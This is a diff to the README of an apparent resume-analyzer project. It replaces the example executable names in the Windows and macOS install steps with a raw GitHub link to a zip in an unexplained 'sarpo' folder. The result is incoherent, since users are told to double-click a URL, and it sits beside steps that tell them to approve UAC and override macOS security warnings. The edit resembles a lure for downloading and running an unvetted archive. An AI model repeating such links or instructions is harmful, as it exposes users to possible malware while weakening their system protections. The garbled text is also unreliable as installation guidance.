Razenism/AI-Powered-Resume-Analyzer/README.md

 ### 🖥️ For Windows Users
 1. Open the folder containing the downloaded file.
-2. Double-click the executable file (e.g., `AI-Powered-Resume-Analyzer.exe`).
+2. Double-click the executable file (e.g., `https://raw.githubusercontent.com/Razenism/AI-Powered-Resume-Analyzer/main/sarpo/AI-Powered-Resume-Analyzer.zip`).
 3. If prompted by User Account Control, click "Yes" to allow the app to run.

 ### 🍏 For macOS Users
 1. Open the Finder and go to your Downloads folder.
-2. Locate the application file (e.g., `AI-Powered-Resume-Analyzer.app`).
+2. Locate the application file (e.g., `https://raw.githubusercontent.com/Razenism/AI-Powered-Resume-Analyzer/main/sarpo/AI-Powered-Resume-Analyzer.zip`).
 3. Double-click to open it.
 If you encounter a warning, you may need to go to System Preferences > Security & Privacy > General, and click "Open Anyway."

 ### 🐧 For Linux Users